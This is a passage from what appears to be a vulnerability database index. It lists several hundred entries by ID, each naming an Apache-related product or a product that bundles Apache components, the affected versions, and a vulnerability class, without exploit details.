4587| [110106] Apache CXF Fediz Spring cross site request forgery
4588| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
4589| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
4590| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
4591| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
4592| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
4593| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
4594| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
4595| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
4596| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
4597| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
4598| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
4599| [108938] Apple macOS up to 10.13.1 apache denial of service
4600| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
4601| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
4602| [108935] Apple macOS up to 10.13.1 apache denial of service
4603| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
4604| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
4605| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
4606| [108931] Apple macOS up to 10.13.1 apache denial of service
4607| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
4608| [108929] Apple macOS up to 10.13.1 apache denial of service
4609| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
4610| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
4611| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
4612| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
4613| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
4614| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
4615| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
4616| [108790] Apache storm 0.9.0.1 Log Viewer directory traversal
4617| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
4618| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
4619| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
4620| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
4621| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
4622| [108782] Apache Xerces2 XML Service denial of service
4623| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
4624| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
4625| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
4626| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
4627| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
4628| [108629] Apache OFBiz up to 10.04.01 privilege escalation
4629| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
4630| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
4631| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
4632| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
4633| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
4634| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
4635| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
4636| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
4637| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
4638| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
4639| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
4640| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
4641| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
4642| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
4643| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
4644| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
4645| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
4646| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
4647| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
4648| [108069] Oracle Endeca Information Discovery Integrator 2.4/3.0/3.1/3.2 Apache Commons Collections memory corruption
4649| [108067] Oracle Business Process Management Suite 11.1.1.9.0/12.2.1.1.0 Apache Commons Collections memory corruption
4650| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
4651| [108065] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Commons Collections memory corruption
4652| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
4653| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
4654| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
4655| [108024] Oracle Communications Order and Service Management 7.2.4.x.x/7.3.0.x.x/7.3.1.x.x/7.3.5.x.x Apache Commons Collections memory corruption
4656| [108015] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Commons Collections memory corruption
4657| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
4658| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
4659| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
4660| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
4661| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
4662| [107639] Apache NiFi 1.4.0 XML External Entity
4663| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
4664| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
4665| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
4666| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
4667| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
4668| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
4669| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
4670| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
4671| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
4672| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
4673| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
4674| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4675| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
4676| [107197] Apache Xerces Jelly Parser XML File XML External Entity
4677| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
4678| [107084] Apache Struts up to 2.3.19 cross site scripting
4679| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
4680| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
4681| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
4682| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
4683| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
4684| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
4685| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
4686| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
4687| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
4688| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
4689| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
4690| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
4691| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4692| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
4693| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
4694| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
4695| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
4696| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
4697| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
4698| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
4699| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
4700| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
4701| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
4702| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
4703| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
4704| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
4705| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
4706| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
4707| [105878] Apache Struts up to 2.3.24.0 privilege escalation
4708| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
4709| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
4710| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
4711| [105643] Apache Pony Mail up to 0.8b weak authentication
4712| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
4713| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
4714| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
4715| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
4716| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
4717| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
4718| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
4719| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
4720| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
4721| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
4722| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
4723| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
4724| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
4725| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
4726| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
4727| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
4728| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
4729| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
4730| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
4731| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
4732| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
4733| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
4734| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
4735| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
4736| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
4737| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
4738| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
4739| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
4740| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
4741| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
4742| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
4743| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
4744| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
4745| [103690] Apache OpenMeetings 1.0.0 sql injection
4746| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
4747| [103688] Apache OpenMeetings 1.0.0 weak encryption
4748| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
4749| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
4750| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
4751| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
4752| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
4753| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
4754| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
4755| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
4756| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
4757| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
4758| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
4759| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
4760| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
4761| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
4762| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
4763| [103352] Apache Solr Node weak authentication
4764| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
4765| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
4766| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
4767| [102697] Apache HTTP Server 2.2.32/2.2.24 HTTP Strict Parsing ap_find_token Request Header memory corruption
4768| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
4769| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
4770| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
4771| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
4772| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
4773| [102536] Apache Ranger up to 0.6 Stored cross site scripting
4774| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
4775| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
4776| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
4777| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
4778| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
4779| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
4780| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
4781| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
4782| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
4783| [101513] Apache jUDDI 3.1.2/3.1.3/3.1.4/3.1. Logout Open Redirect
4784| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
4785| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
4786| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
4787| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
4788| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
4789| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
4790| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
4791| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
4792| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
4793| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
4794| [99937] Apache Batik up to 1.8 privilege escalation
4795| [99936] Apache FOP up to 2.1 privilege escalation
4796| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
4797| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
4798| [99930] Apache Traffic Server up to 6.2.0 denial of service
4799| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
4800| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
4801| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
4802| [117569] Apache Hadoop up to 2.7.3 privilege escalation
4803| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
4804| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
4805| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
4806| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
4807| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
4808| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
4809| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
4810| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
4811| [99014] Apache Camel Jackson/JacksonXML privilege escalation
4812| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4813| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
4814| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4815| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
4816| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
4817| [98605] Apple macOS up to 10.12.3 Apache denial of service
4818| [98604] Apple macOS up to 10.12.3 Apache denial of service
4819| [98603] Apple macOS up to 10.12.3 Apache denial of service
4820| [98602] Apple macOS up to 10.12.3 Apache denial of service
4821| [98601] Apple macOS up to 10.12.3 Apache denial of service
4822| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
4823| [98405] Apache Hadoop up to 0.23.10 privilege escalation
4824| [98199] Apache Camel Validation XML External Entity
4825| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
4826| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
4827| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
4828| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
4829| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
4830| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
4831| [97081] Apache Tomcat HTTPS Request denial of service
4832| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
4833| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
4834| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
4835| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
4836| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
4837| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
4838| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
4839| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
4840| [95311] Apache storm UI Daemon privilege escalation
4841| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
4842| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
4843| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
4844| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
4845| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
4846| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
4847| [94540] Apache Tika 1.9 tika-server File information disclosure
4848| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
4849| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
4850| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
4851| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
4852| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
4853| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
4854| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4855| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
4856| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
4857| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
4858| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
4859| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
4860| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
4861| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
4862| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4863| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
4864| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
4865| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
4866| [93532] Apache Commons Collections Library Java privilege escalation
4867| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
4868| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
4869| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
4870| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
4871| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
4872| [93098] Apache Commons FileUpload privilege escalation
4873| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
4874| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
4875| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
4876| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
4877| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
4878| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
4879| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
4880| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
4881| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
4882| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
4883| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
4884| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
4885| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
4886| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
4887| [92549] Apache Tomcat on Red Hat privilege escalation
4888| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
4889| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
4890| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
4891| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
4892| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
4893| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
4894| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
4895| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
4896| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
4897| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
4898| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
4899| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
4900| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
4901| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
4902| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
4903| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
4904| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
4905| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
4906| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
4907| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
4908| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
4909| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
4910| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
4911| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
4912| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
4913| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
4914| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
4915| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
4916| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
4917| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
4918| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
4919| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
4920| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
4921| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
4922| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
4923| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
4924| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
4925| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
4926| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
4927| [90263] Apache Archiva Header denial of service
4928| [90262] Apache Archiva Deserialize privilege escalation
4929| [90261] Apache Archiva XML DTD Connection privilege escalation
4930| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
4931| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
4932| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
4933| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
4934| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4935| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
4936| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
4937| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
4938| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
